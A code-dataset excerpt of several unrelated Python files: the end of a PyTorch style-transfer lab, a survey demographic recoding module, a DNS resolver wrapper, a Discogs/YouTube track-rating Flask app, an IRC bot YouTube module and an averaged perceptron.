Otherwise the forward method of the criterion\n # will throw an error.\n self.target = target.detach()\n\n def forward(self, input):\n self.loss = F.mse_loss(input, self.target)\n return input\n\n#%% [markdown]\n# # Normalization\n# \n# Normalization of the individual values of the input image will be the first \"layer\" in our DNN.\n\n#%%\ncnn_normalization_mean = torch.tensor([0.485, 0.456, 0.406]).to(device)\ncnn_normalization_std = torch.tensor([0.229, 0.224, 0.225]).to(device)\n\n# create a module to normalize input image so we can easily put it in a\n# nn.Sequential\nclass Normalization(nn.Module):\n def __init__(self, mean, std):\n super(Normalization, self).__init__()\n\n # .view the mean and std to make them [C x 1 x 1] so that they can\n # directly work with image Tensor of shape [B x C x H x W].\n # B is batch size. C is number of channels. H is height and W is width.\n self.mean = torch.tensor(mean).view(-1, 1, 1)\n self.std = torch.tensor(std).view(-1, 1, 1)\n\n def forward(self, img):\n # normalize img\n return (img - self.mean) / self.std\n\n#%% [markdown]\n# #VGG\n# \n# Because Pytorch has pretrained models already, we're not going to bother training our own. Our model of choice is VGG19 model. See the architecture below. Interestingly, we aren't going to use the whole model, we are going to break it up in a way you might not expect.\n# \n# \n# \n# \n\n#%%\nvgg = models.vgg19(pretrained=True).features.to(device).eval()\n\n#%% [markdown]\n# # The network\n# \n# Here is where we're finally are defining our network.\n# \n# For this, we're using 5 Convolutional(Conv) layers, 5 Rectified Linear Unit (Relu) layer, one Max pooling layer, and a normalizing layer.\n# \n# You'll notice that we're using 5 convolutions on our style image, but only one on our content image. This is because building an accurate feature map of our style image is much more important, so that we can accurately place style features on the content without disrupting the original image too much. It also helps us add texture from the style image onto the content image.\n# \n\n#%%\n# desired depth layers to compute style/content losses\ncontent_layers_default = ['conv_4']\nstyle_layers_default = ['conv_1', 'conv_2', 'conv_3', 'conv_4', 'conv_5']\n\n\ndef get_style_model_and_losses(vgg, normalization_mean, normalization_std,\n style_img, content_img,\n content_layers=content_layers_default,\n style_layers=style_layers_default):\n\n # deep copy before butchering\n vgg = copy.deepcopy(vgg)\n\n # normalization module\n normalization = Normalization(normalization_mean, normalization_std).to(device)\n \n\n # just in order to have an iterable access to or list of content/syle\n # losses\n content_losses = []\n style_losses = []\n\n # vgg is a nn.Sequential, so we make a new nn.Sequential\n # to put in modules that are supposed to be activated sequentially\n model = nn.Sequential(normalization)\n\n i = 0 # increment every time we see a conv\n for layer in vgg.children():\n if isinstance(layer, nn.Conv2d):\n i += 1 # increment every time we see a conv\n\n name = 'conv_{}'.format(i)\n elif isinstance(layer, nn.ReLU):\n name = 'relu_{}'.format(i)\n\n # The in-place version doesn't play very nicely with the ContentLoss\n # and StyleLoss we insert below. 
So we replace with out-of-place ones here.\n layer = nn.ReLU(inplace=False)\n elif isinstance(layer, nn.MaxPool2d):\n name = 'pool_{}'.format(i)\n elif isinstance(layer, nn.BatchNorm2d):\n name = 'bn_{}'.format(i)\n else:\n raise RuntimeError('Unrecognized layer: {}'.format(layer.__class__.__name__))\n\n # Add the current vgg layer to our new model\n model.add_module(name, layer)\n\n if name in content_layers:\n \n # get the activations for the content image at this point in the network\n target = model(content_img).detach()\n \n # set up a loss function inside a model layer\n content_loss = ContentLoss(target)\n \n # this layer calculates loss on the activations then\n # passes the activations through unchanged\n model.add_module(\"content_loss_{}\".format(i), content_loss)\n\n # We will need to be able to access the the loss for this layer outside the model\n content_losses.append(content_loss)\n\n if name in style_layers:\n\n # get the activations for the style image at this point in the network\n target = model(style_img).detach()\n\n # set up a loss function inside a model layer\n style_loss = StyleLoss(target)\n\n # this layer calculates loss on the activations then\n # passes the activations through unchanged\n model.add_module(\"style_loss_{}\".format(i), style_loss)\n\n # We will need to be able to access the the loss for this layer outside the model\n style_losses.append(style_loss)\n\n # now we trim off the layers after the last content and style losses\n j = 0\n for j in range(len(model) - 1, -1, -1):\n if isinstance(model[j], ContentLoss) or isinstance(model[j], StyleLoss):\n break\n\n model = model[:(j + 1)]\n\n return model, style_losses, content_losses\n\n#%% [markdown]\n# #Neural Network\n# \n# Here we are all the way at the end!\n# \n# Here you get to finally run both the content and style images through the network we've built, in order to analyze and record relevant data about them. We will then modify our cloned image (or white noise if you decided to do that) into a combination of the style from the style image, and the content from the content image.\n# \n# You can decide the number of epochs you'd like to run to try to get the perfect number of loss (under 5 is great, but be careful not to do too many epochs, otherwise it will flip and you'll get like 30,000 loss) by modifying the num_steps variable in the run_style_transfer() function. 
You can also adjust the weights (you'll notice that style is at one million currently and content is at 1).\n# \n# This will run through as many epochs as you set, and report the loss at every multiple of 50.\n# \n# Congratulations, and have fun!\n\n#%%\ndef get_input_optimizer(input_img):\n # this line to show that input is a parameter that requires a gradient\n optimizer = optim.LBFGS([input_img.requires_grad_()])\n return optimizer\n\ndef run_style_transfer(vgg, normalization_mean, normalization_std,\n content_img, style_img, input_img, num_steps=300,\n style_weight=1000000, content_weight=1):\n \"\"\"Run the style transfer.\"\"\"\n\n print('Building the style transfer model..')\n model, style_losses, content_losses = get_style_model_and_losses(\n vgg, normalization_mean, normalization_std, style_img, content_img\n )\n \n print(\"Get the optimizer..\")\n optimizer = get_input_optimizer(input_img)\n\n print('Optimizing..')\n run = [0]\n while run[0] <= num_steps:\n\n def closure():\n # correct the values of updated input image\n input_img.data.clamp_(0, 1)\n\n optimizer.zero_grad()\n model(input_img)\n style_score = 0\n content_score = 0\n\n for sl in style_losses:\n style_score += sl.loss\n \n for cl in content_losses:\n content_score += cl.loss\n\n style_score *= style_weight\n content_score *= content_weight\n\n loss = style_score + content_score\n loss.backward()\n\n run[0] += 1\n if run[0] % 50 == 0:\n print(\"epoch {}:\".format(run[0]))\n print('Style Loss : {:4f} Content Loss: {:4f}'.format(\n style_score.item(), content_score.item()))\n print()\n\n return style_score + content_score\n\n optimizer.step(closure)\n\n # a last correction...\n input_img.data.clamp_(0, 1)\n\n return input_img\n\n\n\n#%%\n# Set up all done. let's run this thing.\noutput = run_style_transfer(vgg, cnn_normalization_mean, cnn_normalization_std,\n content_img, style_img, input_img)\n\n\n#%%\nimshow([output, content_img, style_img] , title=['Output','Content', 'Style'])\n\n\n", "sub_path": "lab5/style_transfer.py", "file_name": "style_transfer.py", "file_ext": "py", "file_size_in_byte": 14675, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.chdir", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 7, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 55, "usage_type": "attribute"}, {"api_name": "torch.cuda.is_available", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 58, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.Compose", "line_number": 61, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 61, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 62, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 62, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 63, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 63, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 69, "usage_type": "call"}, {"api_name": "PIL.Image", 
"line_number": 69, "usage_type": "name"}, {"api_name": "torch.float", "line_number": 75, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.ToPILImage", "line_number": 79, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "google.colab.files.upload", "line_number": 106, "usage_type": "call"}, {"api_name": "google.colab.files", "line_number": 106, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 109, "usage_type": "call"}, {"api_name": "google.colab.files.upload", "line_number": 120, "usage_type": "call"}, {"api_name": "google.colab.files", "line_number": 120, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 169, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 169, "usage_type": "name"}, {"api_name": "torch.nn.functional.mse_loss", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 180, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 185, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 185, "usage_type": "name"}, {"api_name": "torch.nn.functional.mse_loss", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 196, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 206, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 210, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 210, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 217, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 218, "usage_type": "call"}, {"api_name": "torchvision.models.vgg19", "line_number": 234, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 234, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 258, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 271, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 271, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 275, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 275, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 279, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 279, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 284, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 284, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 
285, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 285, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 287, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 287, "usage_type": "name"}, {"api_name": "torch.optim.LBFGS", "line_number": 351, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 351, "usage_type": "name"}]} +{"seq_id": "537616202", "text": "import logging\n\nimport pandas as pd\nimport numpy as np\nimport dask.dataframe as dd\n\nfrom recoding.src.main.recoding import respondent_level_recoding\n\n\ndef emm_respondent_level_recoding(demo_df, lv):\n \"\"\"\n :param demo_df:\n :param lv:\n :return:\n \"\"\"\n assert isinstance(demo_df, pd.DataFrame)\n\n demo_df = demo_df.rename(columns={col: col.lower() for col in demo_df.columns})\n\n gen_res_df = respondent_level_recoding(demo_df, lv + ['age7'], 'mobileid', 'zip_code')\n\n logger = logging.getLogger(__name__)\n\n res_df = pd.DataFrame()\n\n logger.info('Setting the respondentid from mobile id')\n\n res_df['respondentid'] = demo_df['mobileid'].to_frame()\n\n for demo in lv:\n logger.info('Recoding demographic: {}'.format(demo))\n\n try:\n\n if demo == 'gender_age':\n gen_res_df['agegrp'] = gen_res_df['age7'].isin([1, 2]).astype(int)\n gen_res_df['agegrp'] = 2 * gen_res_df['age7'].isin([3, 4]).astype(int)\n gen_res_df['agegrp'] = 3 * (gen_res_df['age7'] == 5).astype(int)\n\n gen_res_df[demo] = gen_res_df['agegrp']\n\n indices = gen_res_df['gender'] == 2\n gen_res_df.loc[indices, 'gender_age'] += 3\n\n gen_res_df.drop('agegrp', axis=1, inplace=True)\n\n except Exception as e:\n logger.fatal(e, exc_info=True)\n logger.fatal('A column does not exist')\n res_df[demo] = np.nan\n\n res_df = pd.merge(gen_res_df, res_df, on='respondentid')\n\n logger.info('Removing any recoded demographic variables with code 0')\n indices = (res_df == 0).sum(axis=1) == 0\n\n res_df = res_df.loc[indices, :].reset_index(drop=True)\n\n return res_df\n\n\ndef main_emm_recode(emm_raw_df, lv):\n \"\"\"\n :param emm_raw_df:\n :param lv:\n :return:\n \"\"\"\n\n if isinstance(emm_raw_df, pd.DataFrame):\n assert isinstance(lv, list)\n\n return emm_respondent_level_recoding(emm_raw_df, lv)\n\n elif isinstance(emm_raw_df, dd.DataFrame):\n assert isinstance(lv, list)\n\n return emm_raw_df.map_partitions(lambda df: emm_respondent_level_recoding(df, lv))\n", "sub_path": "recoding/src/main/emm/recoding.py", "file_name": "recoding.py", "file_ext": "py", "file_size_in_byte": 2144, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.DataFrame", "line_number": 16, "usage_type": "attribute"}, {"api_name": "recoding.src.main.recoding.respondent_level_recoding", "line_number": 20, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 52, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 69, "usage_type": "attribute"}, {"api_name": "dask.dataframe.DataFrame", "line_number": 74, "usage_type": "attribute"}, {"api_name": "dask.dataframe", "line_number": 74, "usage_type": "name"}]} +{"seq_id": "331238838", "text": "from __future__ import print_function\nfrom js9 import j\n\n\ntry:\n import dns\n import dns.message\n import dns.rdataclass\n import dns.rdatatype\n import 
dns.query\n import dns.resolver\nexcept Exception as e:\n print(\"WARNING install dnspython: 'pip3 install dnspython'\")\n\nJSBASE = j.application.jsbase_get_class()\n\n\nclass DNSTools(JSBASE):\n \"\"\"\n to install:\n pip3 install dnspython\n \"\"\"\n\n def __init__(self):\n self.__jslocation__ = \"j.tools.dnstools\"\n JSBASE.__init__(self)\n self._default = None\n\n def get(self, nameservers=[\"8.26.56.26\", \"8.20.247.20\"],port=53): #https://www.computerworld.com/article/2872700/endpoint-security/6-dns-services-protect-against-malware-and-other-unwanted-content.html?page=3\n if \"localhost\" in nameservers:\n nameservers.pop(nameservers.index(\"localhost\"))\n nameservers.append(\"127.0.0.1\")\n return DNSClient(nameservers=nameservers,port=port)\n\n @property\n def default(self):\n if self._default == None:\n self._default = self.get()\n\n return self._default\n\n def test(self,start=False):\n \"\"\"\n js9 'j.tools.dnstools.test()'\n \"\"\" \n\n answer=self.default.resolver.query(\"www.yelp.com\", 'A')\n\n\n\nclass DNSClient(JSBASE):\n\n def __init__(self, nameservers,port=53):\n JSBASE.__init__(self)\n self.nameservers=nameservers\n self.resolver=dns.resolver.Resolver(configure = False)\n self.resolver.nameservers=self.nameservers\n self.resolver.port=port\n\n\n def nameservers_get(self, domain = \"threefoldtoken.org\"):\n\n answer=self.resolver.query(domain, 'NS')\n\n res=[]\n for rr in answer:\n res.append(rr.target.to_text())\n return res\n\n def namerecords_get(self, dnsurl = \"www.threefoldtoken.org\"):\n \"\"\"\n return ip addr for a full name\n \"\"\"\n\n answer=self.resolver.query(dnsurl, 'A')\n\n res=[]\n for rr in answer:\n res.append(rr.address)\n return res\n", "sub_path": "JumpScale9Lib/tools/dns/DNSTools.py", "file_name": "DNSTools.py", "file_ext": "py", "file_size_in_byte": 2058, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "js9.j.application.jsbase_get_class", "line_number": 15, "usage_type": "call"}, {"api_name": "js9.j.application", "line_number": 15, "usage_type": "attribute"}, {"api_name": "js9.j", "line_number": 15, "usage_type": "name"}, {"api_name": "dns.resolver.Resolver", "line_number": 56, "usage_type": "call"}, {"api_name": "dns.resolver", "line_number": 56, "usage_type": "attribute"}]} +{"seq_id": "456170121", "text": "import urllib\nimport urllib.request as req\nimport re\nimport json\nfrom datetime import time\n\nfrom bs4 import BeautifulSoup\nfrom flask import Flask, abort\nfrom flask import request\nfrom flask import jsonify\n\napp = Flask(__name__)\n\n\nclass RatedTrack:\n def __init__(self, track, views):\n self.track = track\n self.views = views\n\n\ndef fetch_page(url):\n opener = req.build_opener()\n page = opener.open(url)\n return page\n\n\ndef filter_out_tracks(html_data):\n parsed_html = BeautifulSoup(html_data, 'html.parser')\n track_tags = parsed_html.find_all('span', attrs={'class': 'tracklist_track_title'})\n tracks = list(map(lambda t: t.text, list(track_tags)))\n return tracks\n\n\ndef get_track_list(url):\n page = fetch_page(url)\n html_data = page.read()\n return filter_out_tracks(html_data)\n\n\ndef rate_track(artist, track):\n # Get numbers of views\n query = '{}+{}'.format(artist, '+'.join(track.split()))\n query_string = urllib.parse.urlencode({'search_query': query})\n html_content = urllib.request.urlopen('http://www.youtube.com/results?' + query_string)\n search_results = re.findall(r'
  • (.{2,15}) wyświetle[ń|nia]', html_content.read().decode())\n\n # Convert numbers of views to integer\n search_results = [''.join(num.split()) for num in search_results]\n search_results = [int(num) for num in search_results]\n\n # Return the highest number of views\n return sorted(search_results, reverse=True)[0]\n\n\ndef rate_tracks(artist, tracks):\n # Get number of views for all tracks\n rated_tracks = []\n for track in tracks:\n try:\n views = rate_track(artist, track)\n except Exception:\n views = 0\n rated_track = dict()\n rated_track['track'] = track\n rated_track['views'] = views\n rated_tracks.append(rated_track)\n\n # Return a sorted array of tracks\n return sorted(rated_tracks, reverse=True, key=lambda rated_track: rated_track['views'])\n\n\n@app.route('/')\ndef generate_response():\n # Parse arguments\n try:\n artist = request.args[\"artist\"]\n url = request.args[\"url\"]\n except Exception:\n abort(400)\n\n # Get track list\n try:\n tracks = get_track_list(url)\n except:\n abort(404)\n\n # Rate tracks\n try:\n response = rate_tracks(artist, tracks)\n except Exception:\n return json.dumps(tracks)\n\n return json.dumps(response)\n\n\nif __name__ == '__main__':\n app.run()\n #tmp = generate_response('queen', 'https://www.discogs.com/Queen-Queen-II/master/31526')\n #print(tmp)\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2571, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 12, "usage_type": "call"}, {"api_name": "urllib.request.build_opener", "line_number": 22, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 22, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 28, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 43, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 43, "usage_type": "attribute"}, {"api_name": "urllib.request.urlopen", "line_number": 44, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 44, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 76, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 77, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 77, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.abort", "line_number": 85, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 91, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 93, "usage_type": "call"}]} +{"seq_id": "583166405", "text": "# coding=utf8\n\"\"\"\nyoutube.py - Willie YouTube Module\nCopyright 2012, Dimitri Molenaars, Tyrope.nl.\nCopyright © 2012-2014, Elad Alfassa, \nCopyright 2012, Edward Powell, embolalia.net\nLicensed under the Eiffel Forum License 2.\n\nhttp://willie.dfbta.net\n\nThis module will respond to .yt and .youtube commands and searches the youtubes.\n\"\"\"\nfrom __future__ import unicode_literals\n\nfrom willie import web, tools\nfrom willie.module import rule, commands, example\nimport json\nimport re\nimport sys\nif sys.version_info.major < 3:\n from HTMLParser import HTMLParser\nelse:\n from html.parser import HTMLParser\n\nregex = re.compile('(youtube.com/watch\\S*v=|youtu.be/)([\\w-]+)')\n\n\ndef setup(bot):\n if not 
bot.memory.contains('url_callbacks'):\n        bot.memory['url_callbacks'] = tools.WillieMemory()\n    bot.memory['url_callbacks'][regex] = ytinfo\n\n\ndef shutdown(bot):\n    del bot.memory['url_callbacks'][regex]\n\n\ndef ytget(bot, trigger, uri):\n    bytes = web.get(uri)\n    result = json.loads(bytes)\n    try:\n        if 'feed' in result:\n            video_entry = result['feed']['entry'][0]\n        else:\n            video_entry = result['entry']\n    except KeyError:\n        return {'link': 'N/A'}  # Empty result\n\n    vid_info = {}\n    try:\n        # The ID format is tag:youtube.com,2008:video:RYlCVwxoL_g\n        # So we need to split by : and take the last item\n        vid_id = video_entry['id']['$t'].split(':')\n        vid_id = vid_id[len(vid_id) - 1]  # last item is the actual ID\n        vid_info['link'] = 'http://youtu.be/' + vid_id\n    except KeyError:\n        vid_info['link'] = 'N/A'\n\n    try:\n        vid_info['title'] = video_entry['title']['$t']\n    except KeyError:\n        vid_info['title'] = 'N/A'\n\n    #get youtube channel\n    try:\n        vid_info['uploader'] = video_entry['author'][0]['name']['$t']\n    except KeyError:\n        vid_info['uploader'] = 'N/A'\n\n    #get upload time in format: yyyy-MM-ddThh:mm:ss.sssZ\n    try:\n        upraw = video_entry['published']['$t']\n        #parse from current format to output format: DD/MM/yyyy, hh:mm\n        vid_info['uploaded'] = '%s/%s/%s, %s:%s' % (upraw[8:10], upraw[5:7],\n                                                    upraw[0:4], upraw[11:13],\n                                                    upraw[14:16])\n    except KeyError:\n        vid_info['uploaded'] = 'N/A'\n\n    #get duration in seconds (integer division so the parts stay whole numbers on Python 3)\n    try:\n        duration = int(video_entry['media$group']['yt$duration']['seconds'])\n        #Detect liveshow + parse duration into proper time format.\n        if duration < 1:\n            vid_info['length'] = 'LIVE'\n        else:\n            hours = duration // (60 * 60)\n            minutes = duration // 60 - (hours * 60)\n            seconds = duration % 60\n            vid_info['length'] = ''\n            if hours:\n                vid_info['length'] = str(hours) + 'hours'\n                if minutes or seconds:\n                    vid_info['length'] = vid_info['length'] + ' '\n            if minutes:\n                vid_info['length'] = vid_info['length'] + str(minutes) + 'mins'\n                if seconds:\n                    vid_info['length'] = vid_info['length'] + ' '\n            if seconds:\n                vid_info['length'] = vid_info['length'] + str(seconds) + 'secs'\n    except KeyError:\n        vid_info['length'] = 'N/A'\n\n    #get views\n    try:\n        views = video_entry['yt$statistics']['viewCount']\n        vid_info['views'] = str('{0:20,d}'.format(int(views))).lstrip(' ')\n    except KeyError:\n        vid_info['views'] = 'N/A'\n\n    #get comment count\n    try:\n        comments = video_entry['gd$comments']['gd$feedLink']['countHint']\n        vid_info['comments'] = str('{0:20,d}'.format(int(comments))).lstrip(' ')\n    except KeyError:\n        vid_info['comments'] = 'N/A'\n\n    #get likes & dislikes\n    try:\n        likes = video_entry['yt$rating']['numLikes']\n        vid_info['likes'] = str('{0:20,d}'.format(int(likes))).lstrip(' ')\n    except KeyError:\n        vid_info['likes'] = 'N/A'\n    try:\n        dislikes = video_entry['yt$rating']['numDislikes']\n        vid_info['dislikes'] = str('{0:20,d}'.format(int(dislikes))).lstrip(' ')\n    except KeyError:\n        vid_info['dislikes'] = 'N/A'\n    return vid_info\n\n\n@commands('yt', 'youtube')\n@example('.yt how to be a nerdfighter FAQ')\ndef ytsearch(bot, trigger):\n    \"\"\"Search YouTube\"\"\"\n    #modified from ytinfo: Copyright 2010-2011, Michael Yanovich, yanovich.net, Kenneth Sham.\n    if not trigger.group(2):\n        return\n    uri = 'https://gdata.youtube.com/feeds/api/videos?v=2&alt=json&max-results=1&q=' + trigger.group(2)\n    video_info = ytget(bot, trigger, uri)\n\n    if video_info == 'err':\n        return\n\n    if video_info['link'] == 'N/A':\n        bot.say(\"Sorry, I couldn't find the video you are looking for\")\n        return\n    message = ('[YT Search] Title: ' 
video_info['title'] +\n               ' | Uploader: ' + video_info['uploader'] +\n               ' | Duration: ' + video_info['length'] +\n               ' | Uploaded: ' + video_info['uploaded'] +\n               ' | Views: ' + video_info['views'] +\n               ' | Link: ' + video_info['link'])\n\n    bot.say(HTMLParser().unescape(message))\n\n\n@rule('.*(youtube.com/watch\\S*v=|youtu.be/)([\\w-]+).*')\ndef ytinfo(bot, trigger, found_match=None):\n    \"\"\"\n    Get information about the latest video uploaded by the channel provided.\n    \"\"\"\n    match = found_match or trigger\n    #Grab info from YT API\n    uri = 'https://gdata.youtube.com/feeds/api/videos/' + match.group(2) + '?v=2&alt=json'\n\n    video_info = ytget(bot, trigger, uri)\n    if video_info == 'err':\n        return\n\n    #combine variables and print\n    message = '[YouTube] Title: ' + video_info['title'] + \\\n              ' | Uploader: ' + video_info['uploader'] + \\\n              ' | Uploaded: ' + video_info['uploaded'] + \\\n              ' | Duration: ' + video_info['length'] + \\\n              ' | Views: ' + video_info['views'] + \\\n              ' | Comments: ' + video_info['comments'] + \\\n              ' | Likes: ' + video_info['likes'] + \\\n              ' | Dislikes: ' + video_info['dislikes']\n\n    bot.say(HTMLParser().unescape(message))\n\n\n@commands('ytlast', 'ytnew', 'ytlatest')\n@example('.ytlast vlogbrothers')\ndef ytlast(bot, trigger):\n    if not trigger.group(2):\n        return\n    uri = 'https://gdata.youtube.com/feeds/api/users/' + trigger.group(2) + '/uploads?max-results=1&alt=json&v=2'\n    video_info = ytget(bot, trigger, uri)\n\n    if video_info == 'err':\n        return\n\n    message = ('[Latest Video] Title: ' + video_info['title'] +\n               ' | Duration: ' + video_info['length'] +\n               ' | Uploaded: ' + video_info['uploaded'] +\n               ' | Views: ' + video_info['views'] +\n               ' | Likes: ' + video_info['likes'] +\n               ' | Dislikes: ' + video_info['dislikes'] +\n               ' | Link: ' + video_info['link'])\n\n    bot.say(HTMLParser().unescape(message))\n", "sub_path": "willie/modules/youtube.py", "file_name": "youtube.py", "file_ext": "py", "file_size_in_byte": 6932, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "sys.version_info", "line_number": 20, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 25, "usage_type": "call"}, {"api_name": "willie.tools.WillieMemory", "line_number": 30, "usage_type": "call"}, {"api_name": "willie.tools", "line_number": 30, "usage_type": "name"}, {"api_name": "willie.web.get", "line_number": 39, "usage_type": "call"}, {"api_name": "willie.web", "line_number": 39, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 40, "usage_type": "call"}, {"api_name": "html.parser.HTMLParser", "line_number": 155, "usage_type": "call"}, {"api_name": "willie.module.commands", "line_number": 132, "usage_type": "call"}, {"api_name": "willie.module.example", "line_number": 133, "usage_type": "call"}, {"api_name": "html.parser.HTMLParser", "line_number": 181, "usage_type": "call"}, {"api_name": "willie.module.rule", "line_number": 158, "usage_type": "call"}, {"api_name": "html.parser.HTMLParser", "line_number": 203, "usage_type": "call"}, {"api_name": "willie.module.commands", "line_number": 184, "usage_type": "call"}, {"api_name": "willie.module.example", "line_number": 185, "usage_type": "call"}]} +{"seq_id": "377258287", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May  9 23:41:32 2014\n\n@author: boyan\n\"\"\"\nfrom collections import defaultdict\n\n\nclass AveragedPerceptron(object):\n\n    \"\"\"An averaged perceptron\"\"\"\n\n    def __init__(self):\n        # weights is a dict of dicts, 
value=weights[feature][label]\n        self.weights = {}\n        self.labels = set()\n        # The accumulated values, for the averaging.\n        self._totals = defaultdict(int)\n        self._tstamps = defaultdict(int)\n        self.i = 0\n\n    def predict(self, features):\n        \"\"\"Return best label and its score according to given features\"\"\"\n        scores = defaultdict(float)\n        for feat, value in features.items():\n            if feat not in self.weights or value == 0:\n                continue\n            weights = self.weights[feat]\n            for label, weight in weights.items():\n                scores[label] += value * weight\n        return max(self.labels, key=lambda label: (scores[label], label))\n\n    def update(self, truth, guess, features):\n        \"\"\"Update the feature weights\"\"\"\n        def upd(label, feat, w, v):\n            param = (feat, label)\n            self._totals[param] += (self.i - self._tstamps[param]) * w\n            self._tstamps[param] = self.i\n            self.weights[feat][label] = w + v\n\n        self.i += 1\n        if truth != guess:\n            for feat in features:\n                weights = self.weights.setdefault(feat, {})\n                upd(truth, feat, weights.get(truth, 0.0), 1.0)\n                upd(guess, feat, weights.get(guess, 0.0), -1.0)\n\n    def average_weights(self):\n        \"\"\"Average weights from all iterations\"\"\"\n        for feat, label_weights in self.weights.items():\n            new_feat_weights = {}\n            for label, weight in label_weights.items():\n                param = (feat, label)\n                total = self._totals[param]\n                total += (self.i - self._tstamps[param]) * weight\n                averaged = round(total / float(self.i), 3)\n                if averaged:\n                    new_feat_weights[label] = averaged\n            self.weights[feat] = new_feat_weights\n", "sub_path": "perceptron.py", "file_name": "perceptron.py", "file_ext": "py", "file_size_in_byte": 2128, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "collections.defaultdict", "line_number": 19, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 20, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 25, "usage_type": 